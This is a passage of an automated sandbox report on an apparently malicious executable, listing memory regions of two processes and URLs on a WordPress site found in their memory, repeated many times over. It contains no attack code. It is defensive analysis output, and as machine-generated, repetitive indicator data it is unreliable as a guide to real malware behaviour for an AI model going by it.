nhVJ8J5qOt.exe, 00000000.00000003.535738967.0000000004210000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535596512.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.530743113.0000000004200000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.533336279.0000000004210000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542006080.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539899312.00000000045A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.5.2
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535738967.0000000004210000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535596512.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.530743113.0000000004200000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.533336279.0000000004210000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542006080.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539899312.00000000045A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/themes/internet-provider/css/bootstrap.css?ver=6.0.5
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535738967.0000000004210000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535596512.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.530743113.0000000004200000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.533336279.0000000004210000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542006080.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539899312.00000000045A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/themes/internet-provider/css/default.css?ver=6.0.5
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535738967.0000000004210000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535596512.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.530743113.0000000004200000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.533336279.0000000004210000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542006080.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539899312.00000000045A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/themes/internet-provider/css/fontawesome-all.css?ver=6.0.5
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535738967.0000000004210000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535596512.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.530743113.0000000004200000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.533336279.0000000004210000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542006080.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539899312.00000000045A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/themes/internet-provider/css/responsive.css?ver=6.0.5
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535738967.0000000004210000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535596512.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.530743113.0000000004200000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.533336279.0000000004210000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542006080.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539899312.00000000045A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/themes/internet-provider/js/bootstrap.js?ver=6.0.5
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535738967.0000000004210000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535596512.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.530743113.0000000004200000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.533336279.0000000004210000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542006080.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539899312.00000000045A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/themes/internet-provider/js/jquery.superfish.js?ver=6.0.5
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535738967.0000000004210000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535596512.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.530743113.0000000004200000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.533336279.0000000004210000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542006080.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539899312.00000000045A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/themes/internet-provider/js/theme.js?ver=6.0.5
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535738967.0000000004210000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535596512.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.530743113.0000000004200000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.533336279.0000000004210000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542006080.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539899312.00000000045A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/themes/internet-provider/style.css?ver=6.0.5
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535738967.0000000004210000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535596512.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.530743113.0000000004200000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.533336279.0000000004210000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542006080.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539899312.00000000045A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/uploads/2020/06/primo-accedant-226x300.jpg
                  Source: pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/uploads/2020/06/primo-accedant.jpg
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535738967.0000000004210000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535596512.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.530743113.0000000004200000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.533336279.0000000004210000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542006080.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539899312.00000000045A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/uploads/2022/12/image_20210920_231753_527-1024x682.jpg
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535738967.0000000004210000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535596512.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.530743113.0000000004200000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.533336279.0000000004210000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542006080.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539899312.00000000045A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/uploads/2022/12/image_20210920_231753_527-300x200.jpg
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, 